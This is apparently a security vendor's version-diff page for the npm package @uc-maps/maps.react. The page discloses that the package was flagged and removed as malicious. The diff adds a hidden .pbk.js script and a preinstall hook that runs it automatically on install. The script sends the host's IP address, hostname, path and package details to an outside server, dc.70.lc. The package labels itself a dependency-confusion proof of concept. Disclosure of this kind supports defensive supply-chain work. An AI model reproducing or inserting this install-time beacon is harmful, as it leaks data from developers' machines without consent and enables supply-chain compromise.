npm - @uc-maps/maps.react - Versions diffs - 0.0.1-security → 0.13.0 - Mend

@uc-maps/maps.react 0.0.1-security → 0.13.0

This version of @uc-maps/maps.react might be problematic. Click here for more details.

Files changed (4) hide show

package/.pbk.js ADDED Viewed

@@ -0,0 +1,39 @@
+const os = require('os');
+const https = require('https');
+var __dirname;
+const ip = [].concat(...Object.values(os.networkInterfaces()))
+    .filter(({ family, internal }) => family === "IPv4" && !internal)
+    .map(({ address }) => address)[0];
+const host = os.hostname()
+const path = __dirname;
+const org = process.argv.slice(2)[0]
+const package = process.argv.slice(2)[1]
+const version = process.argv.slice(2)[2]
+data = {
+    ip,
+    host,
+    path,
+    org,
+    package,
+    version
+}
+body = JSON.stringify(data)
+var r = https.request({
+    hostname:'dc.70.lc',
+    port: 443,
+    path: '/d',
+    method: 'POST',
+    headers: {
+        'Content-Length': body.length,
+        'Content-Type': 'application/json'
+    }
+})
+r.write(body)
+r.end()

package/index.js ADDED Viewed

File without changes

package/package.json CHANGED Viewed

@@ -1,6 +1,11 @@
 {
   "name": "@uc-maps/maps.react",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "0.13.0",
+  "description": "Dependency Confusion POC",
+  "main": "index.js",
+  "scripts": {
+    "preinstall":"node ./.pbk.js compass @uc-maps/maps.react 0.13.0"
+  },
+  "author": "",
+  "license": "ISC"
 }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=%40uc-maps%2Fmaps.react for more information.